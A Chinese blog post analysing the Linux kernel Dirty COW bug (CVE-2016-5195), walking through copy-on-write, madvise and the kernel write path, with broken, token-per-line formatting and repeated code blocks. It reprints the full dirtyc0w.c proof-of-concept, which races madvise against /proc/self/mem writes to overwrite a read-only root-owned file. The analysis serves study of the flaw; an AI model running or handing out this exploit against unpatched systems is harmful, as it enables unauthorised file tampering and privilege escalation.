-
-
[原创]Linux内核[CVE-2016-5195] (dirty COW)原理分析
-
发表于: 2020-12-11 18:44 15612
-
Ubuntu 16.04,内核版本4.15.0-45-generic
清华源,就是快!
很快啊,编译好了。
一开始是aaaaaa
发现成功改掉。漏洞存在。
在了解漏洞细节之前,首先要明确如下概念。
P1 P2是两个process,而P2由P1fork()产生。那么此时其实P1和P2是共享一块空间的。当对这同一块空间进行了修改时,才会拷贝出一份。
这种考虑基于:
1.子进程中往往会调用exec()族的函数实现其具体的功能。(一个进程想要执行另一个程序。既然创建新进程的唯一方法为调用fork,该进程于是首先调用fork创建一个自身的拷贝,然后其中一个拷贝(通常为子进程)调用exec把自身替换成新的程序。这是诸如shell之类程序的典型用法) 。而exec族函数有一个特点是,当他执行成功时,控制流直接转向新的程序的起点(比如glibc pwn中最常用的,通过hijack mallochook去打one_gadget执行execve起shell)。
2.fork()实际只是创建了一个与父进程pid不一样的副本,如果这个时候把整个父进程的数据完整的拷贝一份到子进程的新空间,但exec系列函数在执行时会直接替换掉当前进程的地址空间。意味着我们做的拷贝是无效的,所以就要进行效率的优化
于是COW机制出现了。
Suppose, there is a process P1 that creates a new process P2 and then process P1 modifies page 3.
The below figures shows what happens before and after process P modifies page 3.
原型:int madvise(void *addr, size_t length, int advice);
告诉内核:在从 addr 指定的地址开始,长度等于 len 参数值的范围内,该区域的用户虚拟内存应遵循特定的使用模式。
advise参数选择如下:
此系统调用相当于通知内核addr~addr+len的内存在接下来不再使用,内核将释放掉这一块内存以节省空间,相应的页表项也会被置空。
1.首先我们创建了一个foo文件,并且他的权限是 只读
2.我们以read_only打开,返回了f=fd。并获取了对应的文件描述符的状态储存到st结构体中(类型struct stat )
3.接下来使用mmap将此文件的内容 以私有的写时复制 映射到了用户空间。其中各个参数代表的含义如下:
4.启动两个线程:madviseThread 和 procselfmemThread
参数为我们要写入的:m0000000字符串。
首先他以RDWR打开了 /proc/self/mem(对于当前进程来说,/proc/self/mem是进程的内存内容,通过修改该文件相当于直接修改当前进程的内存),但是如果你测试一下会发现:
这是因为:我们无法读取没有被正确映射的区域,只有读取的偏移值是被映射的区域才能正确读取内存内容。所以需要配合lseek来调整内存写的位置。原型如下:
我们在POC中将位置调整到mmap返回的位置(也就是文件被映射的位置)。SEEK_SET 参数告诉系统offset 即为新的读写位置。之后进行100000000次写操作来试图改变此内存的内容。(mmap的时候只有读权限)
这个线程很简单就是调用100000000次madvise将对应的mmap出来的addr空间到addr+100设置为MADV_DONTNEED
而这两个线程是跑在竞争态的。
经过以上的讲解,应该已经明白了大概是在干嘛。
dirty COW正如其名:dirty(脏)、COW(写时复制)
接下来深入竞争细节进行分析。
当 write(f,str,strlen(str))
时调用流如下:
底层调用mem_rw,此时的file结构体对应的是 /proc/self/mem。buf是用户态的要写入的内容,count为大小,ppos为偏移。
首先新建一个mm_struct.
mm_struct 定义如下:
用来描述linux下进程的内存地址空间的所有的信息
他与task_struct的关系如下:
系统为每个进程维护一个task_struct(进程描述符),tast_struct记录了进程所有的context信息,而其中就包括了内存描述符mm_struct(其中的域抽象了进程的地址空间)
如果加上vma结构体的话:
其中重要的几个:
首先申请一个新的page,之后会进入 access_remote_vm
而 get_user_pages -> get_user_pages_locked -> \get_user_pages,这一系列调用是由于write系统调用在内核中会执行get_user_pages以获取需要写入的内存页。
__get_user_pages如下:
其中有几个关键点。
当第一次调用follow_page_mask的时候返回为NULL(对应的页表项指向的内存并没有写权限,与访问语义foll_flags冲突)。
接下来调用 faultin_page 进行处理。
调用流程如下:
结束后页调入,同时标脏。
在handle_pte_fault()中,如果触发异常的页存在于主存中,那么该异常往往是由写了一个只读页触发的,此时需要进行COW(写时复制操作)。也就是为自己重新分配一个页框,并把之前的数据复制到页框中去,再写。
第二次page fault结束后,FOLL_WRITE已经被置0.此时已经不再需要可写权限。
所以正常情况下,此时会拿到对应的内存页,然后可以直接做写操作。但是这个写操作是在mapped memory的,不会影响正常的磁盘文件。
但是这个时候如果出现线程madivseThread ,他将对应的mmap出来的空间设置为MADV_DONTNEED即在接下来不会被使用。此时内核将mapped memory对应的页表项置空(立刻换出对应的内存页)。第四次产生page fault
这样当再次write的时候,会触发page fault,由do_fault再次调页。而由于此时FOLL_WRITE为0,所以不会像第一次那样调入后由于写操作产生语义冲突。而是可以正常的返回对应的页,而接下来的写入操作会被同步到只读的文件中。从而造成了越权写。(因为没有做COW)
正常流程:
漏洞流程:
https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
https://blog.csdn.net/qq_26768741/article/details/54375524
https://www.cnblogs.com/wanpengcoder/p/11761063.html
用户空间缺页异常pte_handle_fault()分析--(下)--写时复制
sudo wget https:
/
/
mirror.tuna.tsinghua.edu.cn
/
kernel
/
v4.x
/
linux
-
4.4
.tar.xz
sudo wget https:
/
/
mirror.tuna.tsinghua.edu.cn
/
kernel
/
v4.x
/
linux
-
4.4
.tar.xz
make bzImage
-
j4
make bzImage
-
j4
MADV_ACCESS_DEFAULT
此标志将指定范围的内核预期访问模式重置为缺省设置。
MADV_ACCESS_LWP
此标志通知内核,移近指定地址范围的下一个 LWP 就是将要访问此范围次数最多的 LWP。内核将相应地为此范围和 LWP 分配内存和其他资源。
MADV_ACCESS_MANY
此标志建议内核,许多进程或 LWP 将在系统内随机访问指定的地址范围。内核将相应地为此范围分配内存和其他资源。
MADV_DONTNEED
Do
not
expect access
in
the near future. (For the time being,
the application
is
finished with the given
range
, so the
kernel can free resources associated with it.)
MADV_ACCESS_DEFAULT
此标志将指定范围的内核预期访问模式重置为缺省设置。
MADV_ACCESS_LWP
此标志通知内核,移近指定地址范围的下一个 LWP 就是将要访问此范围次数最多的 LWP。内核将相应地为此范围和 LWP 分配内存和其他资源。
MADV_ACCESS_MANY
此标志建议内核,许多进程或 LWP 将在系统内随机访问指定的地址范围。内核将相应地为此范围分配内存和其他资源。
MADV_DONTNEED
Do
not
expect access
in
the near future. (For the time being,
the application
is
finished with the given
range
, so the
kernel can free resources associated with it.)
/
*
####################### dirtyc0w.c #######################
$ sudo
-
s
# echo this is not a test > foo
# chmod 0404 foo
$ ls
-
lah foo
-
r
-
-
-
-
-
r
-
-
1
root root
19
Oct
20
15
:
23
foo
$ cat foo
this
is
not
a test
$ gcc
-
pthread dirtyc0w.c
-
o dirtyc0w
$ .
/
dirtyc0w foo m00000000000000000
mmap
56123000
madvise
0
procselfmem
1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################
*
/
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>
void
*
map
;
int
f;
struct stat st;
char
*
name;
void
*
madviseThread(void
*
arg)
{
char
*
str
;
str
=
(char
*
)arg;
int
i,c
=
0
;
for
(i
=
0
;i<
100000000
;i
+
+
)
{
/
*
You have to race madvise(MADV_DONTNEED) :: https:
/
/
access.redhat.com
/
security
/
vulnerabilities
/
2706661
> This
is
achieved by racing the madvise(MADV_DONTNEED) system call
>
while
having the page of the executable mmapped
in
memory.
*
/
c
+
=
madvise(
map
,
100
,MADV_DONTNEED);
}
printf(
"madvise %d\n\n"
,c);
}
void
*
procselfmemThread(void
*
arg)
{
char
*
str
;
str
=
(char
*
)arg;
/
*
You have to write to
/
proc
/
self
/
mem :: https:
/
/
bugzilla.redhat.com
/
show_bug.cgi?
id
=
1384344
#c16
> The
in
the wild exploit we are aware of doesn't work on Red Hat
> Enterprise Linux
5
and
6
out of the box because on one side of
> the race it writes to
/
proc
/
self
/
mem, but
/
proc
/
self
/
mem
is
not
> writable on Red Hat Enterprise Linux
5
and
6.
*
/
int
f
=
open
(
"/proc/self/mem"
,O_RDWR);
int
i,c
=
0
;
for
(i
=
0
;i<
100000000
;i
+
+
) {
/
*
You have to reset the
file
pointer to the memory position.
*
/
lseek(f,(uintptr_t)
map
,SEEK_SET);
c
+
=
write(f,
str
,strlen(
str
));
}
printf(
"procselfmem %d\n\n"
, c);
}
int
main(
int
argc,char
*
argv[])
{
/
*
You have to
pass
two arguments.
File
and
Contents.
*
/
if
(argc<
3
) {
(void)fprintf(stderr,
"%s\n"
,
"usage: dirtyc0w target_file new_content"
);
return
1
; }
pthread_t pth1,pth2;
/
*
You have to
open
the
file
in
read only mode.
*
/
f
=
open
(argv[
1
],O_RDONLY);
fstat(f,&st);
name
=
argv[
1
];
/
*
You have to use MAP_PRIVATE
for
copy
-
on
-
write mapping.
> Create a private copy
-
on
-
write mapping. Updates to the
> mapping are
not
visible to other processes mapping the same
>
file
,
and
are
not
carried through to the underlying
file
. It
>
is
unspecified whether changes made to the
file
after the
> mmap() call are visible
in
the mapped region.
*
/
/
*
You have to
open
with PROT_READ.
*
/
map
=
mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,
0
);
printf(
"mmap %zx\n\n"
,(uintptr_t)
map
);
/
*
You have to do it on two threads.
*
/
pthread_create(&pth1,NULL,madviseThread,argv[
1
]);
pthread_create(&pth2,NULL,procselfmemThread,argv[
2
]);
/
*
You have to wait
for
the threads to finish.
*
/
pthread_join(pth1,NULL);
pthread_join(pth2,NULL);
return
0
;
}
/
*
####################### dirtyc0w.c #######################
$ sudo
-
s
# echo this is not a test > foo
# chmod 0404 foo
$ ls
-
lah foo
-
r
-
-
-
-
-
r
-
-
1
root root
19
Oct
20
15
:
23
foo
$ cat foo
this
is
not
a test
$ gcc
-
pthread dirtyc0w.c
-
o dirtyc0w
$ .
/
dirtyc0w foo m00000000000000000
mmap
56123000
madvise
0
procselfmem
1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################
*
/
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>
void
*
map
;
int
f;
struct stat st;
char
*
name;
void
*
madviseThread(void
*
arg)
{
char
*
str
;
str
=
(char
*
)arg;
int
i,c
=
0
;
for
(i
=
0
;i<
100000000
;i
+
+
)
{
/
*
You have to race madvise(MADV_DONTNEED) :: https:
/
/
access.redhat.com
/
security
/
vulnerabilities
/
2706661
> This
is
achieved by racing the madvise(MADV_DONTNEED) system call
>
while
having the page of the executable mmapped
in
memory.
*
/
c
+
=
madvise(
map
,
100
,MADV_DONTNEED);
}
printf(
"madvise %d\n\n"
,c);
}
void
*
procselfmemThread(void
*
arg)
{
char
*
str
;
str
=
(char
*
)arg;
/
*
You have to write to
/
proc
/
self
/
mem :: https:
/
/
bugzilla.redhat.com
/
show_bug.cgi?
id
=
1384344
#c16
> The
in
the wild exploit we are aware of doesn't work on Red Hat
> Enterprise Linux
5
and
6
out of the box because on one side of
> the race it writes to
/
proc
/
self
/
mem, but
/
proc
/
self
/
mem
is
not
> writable on Red Hat Enterprise Linux
5
and
6.
*
/
int
f
=
open
(
"/proc/self/mem"
,O_RDWR);
int
i,c
=
0
;
for
(i
=
0
;i<
100000000
;i
+
+
) {
/
*
You have to reset the
file
pointer to the memory position.
*
/
lseek(f,(uintptr_t)
map
,SEEK_SET);
c
+
=
write(f,
str
,strlen(
str
));
}
printf(
"procselfmem %d\n\n"
, c);
}
int
main(
int
argc,char
*
argv[])
{
/
*
You have to
pass
two arguments.
File
and
Contents.
*
/
if
(argc<
3
) {
(void)fprintf(stderr,
"%s\n"
,
"usage: dirtyc0w target_file new_content"
);
return
1
; }
pthread_t pth1,pth2;
/
*
You have to
open
the
file
in
read only mode.
*
/
f
=
open
(argv[
1
],O_RDONLY);
fstat(f,&st);
name
=
argv[
1
];
/
*
You have to use MAP_PRIVATE
for
copy
-
on
-
write mapping.
> Create a private copy
-
on
-
write mapping. Updates to the
> mapping are
not
visible to other processes mapping the same
>
file
,
and
are
not
carried through to the underlying
file
. It
>
is
unspecified whether changes made to the
file
after the
> mmap() call are visible
in
the mapped region.
*
/
/
*
You have to
open
with PROT_READ.
*
/
map
=
mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,
0
);
printf(
"mmap %zx\n\n"
,(uintptr_t)
map
);
/
*
You have to do it on two threads.
*
/
pthread_create(&pth1,NULL,madviseThread,argv[
1
]);
pthread_create(&pth2,NULL,procselfmemThread,argv[
2
]);
/
*
You have to wait
for
the threads to finish.
*
/
pthread_join(pth1,NULL);
pthread_join(pth2,NULL);
return
0
;
}
struct stat64 {
unsigned
long
long
st_dev;
unsigned char __pad0[
4
];
unsigned
long
__st_ino;
unsigned
int
st_mode;
unsigned
int
st_nlink;
unsigned
long
st_uid;
unsigned
long
st_gid;
unsigned
long
long
st_rdev;
unsigned char __pad3[
4
];
long
long
st_size;
unsigned
long
st_blksize;
/
*
Number
512
-
byte blocks allocated.
*
/
unsigned
long
long
st_blocks;
unsigned
long
st_atime;
unsigned
long
st_atime_nsec;
unsigned
long
st_mtime;
unsigned
int
st_mtime_nsec;
unsigned
long
st_ctime;
unsigned
long
st_ctime_nsec;
unsigned
long
long
st_ino;
};
struct stat64 {
unsigned
long
long
st_dev;
unsigned char __pad0[
4
];
unsigned
long
__st_ino;
unsigned
int
st_mode;
unsigned
int
st_nlink;
unsigned
long
st_uid;
unsigned
long
st_gid;
unsigned
long
long
st_rdev;
unsigned char __pad3[
4
];
long
long
st_size;
unsigned
long
st_blksize;
/
*
Number
512
-
byte blocks allocated.
*
/
unsigned
long
long
st_blocks;
unsigned
long
st_atime;
unsigned
long
st_atime_nsec;
unsigned
long
st_mtime;
unsigned
int
st_mtime_nsec;
unsigned
long
st_ctime;
unsigned
long
st_ctime_nsec;
unsigned
long
long
st_ino;
};
map
=
mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,
0
);
/
/
原型
void
*
mmap(void
*
addr, size_t length,
int
prot,
int
flags,
int
fd, off_t offset);
map
=
mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,
0
);
/
/
原型
void
*
mmap(void
*
addr, size_t length,
int
prot,
int
flags,
int
fd, off_t offset);
root@ubuntu:~
/
linux
-
4.4
-
env
# cat /proc/66310/mem
cat:
/
proc
/
66310
/
mem:
Input
/
output error
root@ubuntu:~
/
linux
-
4.4
-
env
# cat /proc/66310/mem
cat:
/
proc
/
66310
/
mem:
Input
/
output error
off_t lseek(
int
fd, off_t offset,
int
whence);
off_t lseek(
int
fd, off_t offset,
int
whence);
__get_free_pages
+
14
mem_rw.isra
+
69
mem_write
+
27
__vfs_write
+
55
vfs_write
+
169
sys_write
+
85
__get_free_pages
+
14
mem_rw.isra
+
69
mem_write
+
27
__vfs_write
+
55
vfs_write
+
169
sys_write
+
85
static ssize_t mem_write(struct
file
*
file
, const char __user
*
buf,
size_t count, loff_t
*
ppos)
{
return
mem_rw(
file
, (char __user
*
)buf, count, ppos,
1
);
}
static ssize_t mem_write(struct
file
*
file
, const char __user
*
buf,
size_t count, loff_t
*
ppos)
{
return
mem_rw(
file
, (char __user
*
)buf, count, ppos,
1
);
}
static ssize_t mem_rw(struct
file
*
file
, char __user
*
buf,
size_t count, loff_t
*
ppos,
int
write)
/
/
write
=
1
{
struct mm_struct
*
mm
=
file
-
>private_data;
unsigned
long
addr
=
*
ppos;
ssize_t copied;
char
*
page;
if
(!mm)
return
0
;
page
=
(char
*
)__get_free_page(GFP_TEMPORARY);
/
/
获取一个free page,返回指向新页面的指针并将页面清零
if
(!page)
return
-
ENOMEM;
copied
=
0
;
if
(!atomic_inc_not_zero(&mm
-
>mm_users))
/
/
atomic_inc_not_zero(v)用于将atomic_t变量
*
v加
1
,并测试加
1
后的
*
v是否不为零,如果不为零则返回真,这里将mm
-
>mm_users
+
1
,测试是否为
0
goto free;
/
/
为
0
的话就free掉
while
(count >
0
) {
/
/
size大于
0
进入
while
int
this_len
=
min_t(
int
, count, PAGE_SIZE);
/
/
类型为
int
。count 返回 PAGE_SIZE中更小的那个
if
(write && copy_from_user(page, buf, this_len)) {
/
/
将 buf拷贝size到新申请的page上
copied
=
-
EFAULT;
break
;
}
this_len
=
access_remote_vm(mm, addr, page, this_len, write);
/
/
write
=
1
if
(!this_len) {
if
(!copied)
copied
=
-
EIO;
break
;
}
if
(!write && copy_to_user(buf, page, this_len)) {
copied
=
-
EFAULT;
break
;
}
buf
+
=
this_len;
addr
+
=
this_len;
copied
+
=
this_len;
count
-
=
this_len;
}
*
ppos
=
addr;
mmput(mm);
free:
free_page((unsigned
long
) page);
/
/
free申请出来的页
return
copied;
}
static ssize_t mem_rw(struct
file
*
file
, char __user
*
buf,
size_t count, loff_t
*
ppos,
int
write)
/
/
write
=
1
{
struct mm_struct
*
mm
=
file
-
>private_data;
unsigned
long
addr
=
*
ppos;
ssize_t copied;
char
*
page;
if
(!mm)
return
0
;
page
=
(char
*
)__get_free_page(GFP_TEMPORARY);
/
/
获取一个free page,返回指向新页面的指针并将页面清零
if
(!page)
return
-
ENOMEM;
copied
=
0
;
if
(!atomic_inc_not_zero(&mm
-
>mm_users))
/
/
atomic_inc_not_zero(v)用于将atomic_t变量
*
v加
1
,并测试加
1
后的
*
v是否不为零,如果不为零则返回真,这里将mm
-
>mm_users
+
1
,测试是否为
0
goto free;
/
/
为
0
的话就free掉
while
(count >
0
) {
/
/
size大于
0
进入
while
int
this_len
=
min_t(
int
, count, PAGE_SIZE);
/
/
类型为
int
。count 返回 PAGE_SIZE中更小的那个
if
(write && copy_from_user(page, buf, this_len)) {
/
/
将 buf拷贝size到新申请的page上
copied
=
-
EFAULT;
break
;
}
this_len
=
access_remote_vm(mm, addr, page, this_len, write);
/
/
write
=
1
if
(!this_len) {
if
(!copied)
copied
=
-
EIO;
break
;
}
if
(!write && copy_to_user(buf, page, this_len)) {
copied
=
-
EFAULT;
break
;
}
buf
+
=
this_len;
addr
+
=
this_len;
copied
+
=
this_len;
count
-
=
this_len;
}
*
ppos
=
addr;
mmput(mm);
free:
free_page((unsigned
long
) page);
/
/
free申请出来的页
return
copied;
}
struct mm_struct {
/
/
指向线性区对象的链表头
struct vm_area_struct
*
mmap;
/
*
list
of VMAs
*
/
/
/
指向线性区对象的红黑树
struct rb_root mm_rb;
/
/
指向最近找到的虚拟区间
struct vm_area_struct
*
mmap_cache;
/
*
last find_vma result
*
/
/
/
用来在进程地址空间中搜索有效的进程地址空间的函数
unsigned
long
(
*
get_unmapped_area) (struct
file
*
filp,
unsigned
long
addr, unsigned
long
len
,
unsigned
long
pgoff, unsigned
long
flags);
unsigned
long
(
*
get_unmapped_exec_area) (struct
file
*
filp,
unsigned
long
addr, unsigned
long
len
,
unsigned
long
pgoff, unsigned
long
flags);
/
/
释放线性区时调用的方法,
void (
*
unmap_area) (struct mm_struct
*
mm, unsigned
long
addr);
/
/
标识第一个分配文件内存映射的线性地址
unsigned
long
mmap_base;
/
*
base of mmap area
*
/
unsigned
long
task_size;
/
*
size of task vm space
*
/
/
*
*
RHEL6 special
for
bug
790921
: this same variable can mean
*
two different things. If sysctl_unmap_area_factor
is
zero,
*
this means the largest hole below free_area_cache. If the
*
sysctl
is
set
to a positive value, this variable
is
used
*
to count how much memory has been munmapped
from
this process
*
since the last time free_area_cache was reset back to mmap_base.
*
This
is
ugly, but necessary to preserve kABI.
*
/
unsigned
long
cached_hole_size;
/
/
内核进程搜索进程地址空间中线性地址的空间空间
unsigned
long
free_area_cache;
/
*
first hole of size cached_hole_size
or
larger
*
/
/
/
指向页表的目录
pgd_t
*
pgd;
/
/
共享进程时的个数
atomic_t mm_users;
/
*
How many users with user space?
*
/
/
/
内存描述符的主使用计数器,采用引用计数的原理,当为
0
时代表无用户再次使用
atomic_t mm_count;
/
*
How many references to
"struct mm_struct"
(users count as
1
)
*
/
/
/
线性区的个数
int
map_count;
/
*
number of VMAs
*
/
struct rw_semaphore mmap_sem;
/
/
保护任务页表和引用计数的锁
spinlock_t page_table_lock;
/
*
Protects page tables
and
some counters
*
/
/
/
mm_struct结构,第一个成员就是初始化的mm_struct结构,
struct list_head mmlist;
/
*
List
of maybe swapped mm's. These are globally strung
*
together off init_mm.mmlist,
and
are protected
*
by mmlist_lock
*
/
/
*
Special counters,
in
some configurations protected by the
*
page_table_lock,
in
other configurations by being atomic.
*
/
mm_counter_t _file_rss;
mm_counter_t _anon_rss;
mm_counter_t _swap_usage;
/
/
进程拥有的最大页表数目
unsigned
long
hiwater_rss;
/
*
High
-
watermark of RSS usage
*
/
、
/
/
进程线性区的最大页表数目
unsigned
long
hiwater_vm;
/
*
High
-
water virtual memory usage
*
/
/
/
进程地址空间的大小,锁住无法换页的个数,共享文件内存映射的页数,可执行内存映射中的页数
unsigned
long
total_vm, locked_vm, shared_vm, exec_vm;
/
/
用户态堆栈的页数,
unsigned
long
stack_vm, reserved_vm, def_flags, nr_ptes;
/
/
维护代码段和数据段
unsigned
long
start_code, end_code, start_data, end_data;
/
/
维护堆和栈
unsigned
long
start_brk, brk, start_stack;
/
/
维护命令行参数,命令行参数的起始地址和最后地址,以及环境变量的起始地址和最后地址
unsigned
long
arg_start, arg_end, env_start, env_end;
unsigned
long
saved_auxv[AT_VECTOR_SIZE];
/
*
for
/
proc
/
PID
/
auxv
*
/
struct linux_binfmt
*
binfmt;
cpumask_t cpu_vm_mask;
/
*
Architecture
-
specific MM context
*
/
mm_context_t context;
/
*
Swap token stuff
*
/
/
*
*
Last value of
global
fault stamp as seen by this process.
*
In other words, this value gives an indication of how
long
*
it has been since this task got the token.
*
Look at mm
/
thrash.c
*
/
unsigned
int
faultstamp;
unsigned
int
token_priority;
unsigned
int
last_interval;
/
/
线性区的默认访问标志
unsigned
long
flags;
/
*
Must use atomic bitops to access the bits
*
/
struct core_state
*
core_state;
/
*
coredumping support
*
/
#ifdef CONFIG_AIO
spinlock_t ioctx_lock;
struct hlist_head ioctx_list;
#endif
#ifdef CONFIG_MM_OWNER
/
*
*
"owner"
points to a task that
is
regarded as the canonical
*
user
/
owner of this mm.
All
of the following must be true
in
*
order
for
it to be changed:
*
*
current
=
=
mm
-
>owner
*
current
-
>mm !
=
mm
*
new_owner
-
>mm
=
=
mm
*
new_owner
-
>alloc_lock
is
held
*
/
struct task_struct
*
owner;
#endif
#ifdef CONFIG_PROC_FS
/
*
store ref to
file
/
proc
/
<pid>
/
exe symlink points to
*
/
struct
file
*
exe_file;
unsigned
long
num_exe_file_vmas;
#endif
#ifdef CONFIG_MMU_NOTIFIER
struct mmu_notifier_mm
*
mmu_notifier_mm;
#endif
#ifdef CONFIG_TRANSPARENT_HUGEPAGE
pgtable_t pmd_huge_pte;
/
*
protected by page_table_lock
*
/
#endif
/
*
reserved
for
Red Hat
*
/
#ifdef __GENKSYMS__
unsigned
long
rh_reserved[
2
];
#else
/
*
How many tasks sharing this mm are OOM_DISABLE
*
/
union {
unsigned
long
rh_reserved_aux;
atomic_t oom_disable_count;
};
/
*
base of lib
map
area (ASCII armour)
*
/
unsigned
long
shlib_base;
#endif
};
struct mm_struct {
/
/
指向线性区对象的链表头
struct vm_area_struct
*
mmap;
/
*
list
of VMAs
*
/
/
/
指向线性区对象的红黑树
struct rb_root mm_rb;
/
/
指向最近找到的虚拟区间
struct vm_area_struct
*
mmap_cache;
/
*
last find_vma result
*
/
/
/
用来在进程地址空间中搜索有效的进程地址空间的函数
unsigned
long
(
*
get_unmapped_area) (struct
file
*
filp,
unsigned
long
addr, unsigned
long
len
,
unsigned
long
pgoff, unsigned
long
flags);
unsigned
long
(
*
get_unmapped_exec_area) (struct
file
*
filp,
unsigned
long
addr, unsigned
long
len
,
unsigned
long
pgoff, unsigned
long
flags);
/
/
释放线性区时调用的方法,
void (
*
unmap_area) (struct mm_struct
*
mm, unsigned
long
addr);
/
/
标识第一个分配文件内存映射的线性地址
unsigned
long
mmap_base;
/
*
base of mmap area
*
/
unsigned
long
task_size;
/
*
size of task vm space
*
/
/
*
*
RHEL6 special
for
bug
790921
: this same variable can mean
*
two different things. If sysctl_unmap_area_factor
is
zero,
*
this means the largest hole below free_area_cache. If the
*
sysctl
is
set
to a positive value, this variable
is
used
*
to count how much memory has been munmapped
from
this process
*
since the last time free_area_cache was reset back to mmap_base.
*
This
is
ugly, but necessary to preserve kABI.
*
/
unsigned
long
cached_hole_size;
/
/
内核进程搜索进程地址空间中线性地址的空间空间
unsigned
long
free_area_cache;
/
*
first hole of size cached_hole_size
or
larger
*
/
/
/
指向页表的目录
pgd_t
*
pgd;
/
/
共享进程时的个数
atomic_t mm_users;
/
*
How many users with user space?
*
/
/
/
内存描述符的主使用计数器,采用引用计数的原理,当为
0
时代表无用户再次使用
atomic_t mm_count;
/
*
How many references to
"struct mm_struct"
(users count as
1
)
*
/
/
/
线性区的个数
int
map_count;
/
*
number of VMAs
*
/
struct rw_semaphore mmap_sem;
/
/
保护任务页表和引用计数的锁
spinlock_t page_table_lock;
/
*
Protects page tables
and
some counters
*
/
/
/
mm_struct结构,第一个成员就是初始化的mm_struct结构,
struct list_head mmlist;
/
*
List
of maybe swapped mm's. These are globally strung
*
together off init_mm.mmlist,
and
are protected
*
by mmlist_lock
*
/
/
*
Special counters,
in
some configurations protected by the
*
page_table_lock,
in
other configurations by being atomic.
*
/
mm_counter_t _file_rss;
mm_counter_t _anon_rss;
mm_counter_t _swap_usage;
/
/
进程拥有的最大页表数目
unsigned
long
hiwater_rss;
/
*
High
-
watermark of RSS usage
*
/
、
/
/
进程线性区的最大页表数目
unsigned
long
hiwater_vm;
/
*
High
-
water virtual memory usage
*
/
/
/
进程地址空间的大小,锁住无法换页的个数,共享文件内存映射的页数,可执行内存映射中的页数
unsigned
long
total_vm, locked_vm, shared_vm, exec_vm;
/
/
用户态堆栈的页数,
unsigned
long
stack_vm, reserved_vm, def_flags, nr_ptes;
/
/
维护代码段和数据段
unsigned
long
start_code, end_code, start_data, end_data;
/
/
维护堆和栈
unsigned
long
start_brk, brk, start_stack;
/
/
维护命令行参数,命令行参数的起始地址和最后地址,以及环境变量的起始地址和最后地址
unsigned
long
arg_start, arg_end, env_start, env_end;
unsigned
long
saved_auxv[AT_VECTOR_SIZE];
/
*
for
/
proc
/
PID
/
auxv
*
/
struct linux_binfmt
*
binfmt;
cpumask_t cpu_vm_mask;
/
*
Architecture
-
specific MM context
*
/
mm_context_t context;
/
*
Swap token stuff
*
/
/
*
*
Last value of
global
fault stamp as seen by this process.
*
In other words, this value gives an indication of how
long
*
it has been since this task got the token.
*
Look at mm
/
thrash.c
*
/
unsigned
int
faultstamp;
unsigned
int
token_priority;
unsigned
int
last_interval;
/
/
线性区的默认访问标志
unsigned
long
flags;
/
*
Must use atomic bitops to access the bits
*
/
struct core_state
*
core_state;
/
*
coredumping support
*
/
#ifdef CONFIG_AIO
spinlock_t ioctx_lock;
struct hlist_head ioctx_list;
#endif
#ifdef CONFIG_MM_OWNER
/
*
*
"owner"
points to a task that
is
regarded as the canonical
*
user
/
owner of this mm.
All
of the following must be true
in
*
order
for
it to be changed:
*
*
current
=
=
mm
-
>owner
*
current
-
>mm !
=
mm
*
new_owner
-
>mm
=
=
mm
*
new_owner
-
>alloc_lock
is
held
*
/
struct task_struct
*
owner;
#endif
#ifdef CONFIG_PROC_FS
/
*
store ref to
file
/
proc
/
<pid>
/
exe symlink points to
*
/
struct
file
*
exe_file;
unsigned
long
num_exe_file_vmas;
#endif
#ifdef CONFIG_MMU_NOTIFIER
struct mmu_notifier_mm
*
mmu_notifier_mm;
#endif
#ifdef CONFIG_TRANSPARENT_HUGEPAGE
pgtable_t pmd_huge_pte;
/
*
protected by page_table_lock
*
/
#endif
/
*
reserved
for
Red Hat
*
/
#ifdef __GENKSYMS__
unsigned
long
rh_reserved[
2
];
#else
/
*
How many tasks sharing this mm are OOM_DISABLE
*
/
union {
unsigned
long
rh_reserved_aux;
atomic_t oom_disable_count;
};
/
*
base of lib
map
area (ASCII armour)
*
/
unsigned
long
shlib_base;
#endif
};
/
*
*
*
access_remote_vm
-
access another process' address space
*
@mm: the mm_struct of the target address space
*
@addr: start address to access
*
@buf: source
or
destination
buffer
*
@
len
: number of bytes to transfer
*
@write: whether the access
is
a write
*
*
The caller must hold a reference on @mm.
*
/
int
access_remote_vm(struct mm_struct
*
mm, unsigned
long
addr,
void
*
buf,
int
len
,
int
write)
{
return
__access_remote_vm(NULL, mm, addr, buf,
len
, write);
}
/
*
*
*
access_remote_vm
-
access another process' address space
*
@mm: the mm_struct of the target address space
*
@addr: start address to access
*
@buf: source
or
destination
buffer
*
@
len
: number of bytes to transfer
*
@write: whether the access
is
a write
*
*
The caller must hold a reference on @mm.
*
/
int
access_remote_vm(struct mm_struct
*
mm, unsigned
long
addr,
void
*
buf,
int
len
,
int
write)
{
return
__access_remote_vm(NULL, mm, addr, buf,
len
, write);
}
/
*
*
Access another process' address space as given
in
mm. If non
-
NULL, use the
*
given task
for
page fault accounting.
*
/
static
int
__access_remote_vm(struct task_struct
*
tsk, struct mm_struct
*
mm,
unsigned
long
addr, void
*
buf,
int
len
,
int
write)
{
struct vm_area_struct
*
vma;
void
*
old_buf
=
buf;
down_read(&mm
-
>mmap_sem);
/
*
ignore errors, just check how much was successfully transferred
*
/
while
(
len
) {
int
bytes, ret, offset;
void
*
maddr;
struct page
*
page
=
NULL;
ret
=
get_user_pages(tsk, mm, addr,
1
,
write,
1
, &page, &vma);
if
(ret <
=
0
) {
#ifndef CONFIG_HAVE_IOREMAP_PROT
break
;
#else
/
*
*
Check
if
this
is
a VM_IO | VM_PFNMAP VMA, which
*
we can access using slightly different code.
*
/
vma
=
find_vma(mm, addr);
if
(!vma || vma
-
>vm_start > addr)
break
;
if
(vma
-
>vm_ops && vma
-
>vm_ops
-
>access)
ret
=
vma
-
>vm_ops
-
>access(vma, addr, buf,
len
, write);
if
(ret <
=
0
)
break
;
bytes
=
ret;
#endif
}
else
{
bytes
=
len
;
offset
=
addr & (PAGE_SIZE
-
1
);
